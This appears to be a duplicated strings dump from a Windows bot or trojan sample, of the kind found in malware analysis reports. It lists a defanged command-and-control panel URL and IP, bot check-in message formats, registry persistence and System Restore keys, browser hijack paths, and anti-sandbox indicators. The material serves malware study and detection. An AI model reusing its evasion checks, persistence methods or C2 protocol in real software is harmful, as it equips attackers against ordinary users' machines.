uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~
libgcj-13.dll
libgcj-13.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
%s--%s
%s--%s
%s\B%i.tmp
%s\B%i.tmp
http.
http.
hXXp://
hXXp://
hXXps://
hXXps://
%y%m%d
%y%m%d
%s:%i
%s:%i
%s\browser%li.html
%s\browser%li.html
%s "%s"
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
NoWindowsUpdate
%s@%s
%s@%s
%s\I%li.bat
%s\I%li.bat
%s\U%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Google Chrome
Opera
Opera
Firefox
Firefox
chrome.exe
chrome.exe
opera.exe
opera.exe
firefox.exe
firefox.exe
iexplore.exe
iexplore.exe
Maxthon.exe
Maxthon.exe
%s(%s)
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s%s%i%s%s%s%s%s
%s:%s
%s:%s
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
autoruns.exe
explorer.exe
explorer.exe
SbieDll.dll
SbieDll.dll
snxhk.dll
snxhk.dll
dbghelp.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-640-1457236-23837
76487-644-3177037-23510
76487-644-3177037-23510
55274-640-2673064-23950
55274-640-2673064-23950
76497-640-6308873-23835
76497-640-6308873-23835
Windows Task Manager
Windows Task Manager
%s %i %i
%s %i %i
.hidden
.hidden
filesearch.stop
filesearch.stop
%s@%s:%i
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
%s\Microsoft.NET\Framework\
v4.0.30319
v4.0.30319
v2.0.50727
v2.0.50727
\explorer.exe
\explorer.exe
HTTP/1.
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTP/1.
HTTP/1.
dnsapi.dll
dnsapi.dll
%s & %s
%s & %s
Software\Microsoft\Windows\CurrentVersion\
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
\Microsoft\Windows
%s%s%s%s%i%s%s
%s%s%s%s%i%s%s
:Zone.Identifier
:Zone.Identifier
%s\K%li.bat
%s\K%li.bat
document.write(unescape('%s'));
document.write(unescape('%s'));
operator
operator
operator
operator
global constructors keyed to
global constructors keyed to
global destructors keyed to
global destructors keyed to
operator""
operator""
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
fc_key
fc_key
use_fc_key
use_fc_key
hXXp://23.228.100.130/~vpnmaste/panel/gate.php
hXXp://23.228.100.130/~vpnmaste/panel/gate.php
v1.0.8
v1.0.8
~vpnmaste/panel/gate.php
~vpnmaste/panel/gate.php
23.228.100.130
23.228.100.130
%WinDir%
%WinDir%
%Program Files%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
e.exe
ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8
ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8
306197153
306197153
c:\%original file name%.exe
c:\%original file name%.exe
%WinDir%\306197153
%WinDir%\306197153
%WinDir%\306197153\ADService
%WinDir%\306197153\ADService
NICK
NICK
JOIN
JOIN
PRIVMSG
PRIVMSG
GetProcessHeap
GetProcessHeap
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegFlushKey
RegFlushKey
RegOpenKeyExA
RegOpenKeyExA
ShellExecuteA
ShellExecuteA
InternetOpenUrlA
InternetOpenUrlA
.text
.text
P`.data
P`.data
.rdata
.rdata
`@.eh_fram
`@.eh_fram
0@.bss
0@.bss
.idata
.idata
VXa# %D
VXa# %D
&%spie);
&%spie);
.kedD
.kedD
.CRT
.CRT
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
msvcrt.dll
msvcrt.dll
SHELL32.DLL
SHELL32.DLL
USER32.dll
USER32.dll
WININET.DLL
WININET.DLL
Okernel32.dll
Okernel32.dll
advapi32.dll
advapi32.dll
Aicmp.dll
Aicmp.dll
surlmon.dll
surlmon.dll
gws2_32.dll
gws2_32.dll
rpcrt4.dll
rpcrt4.dll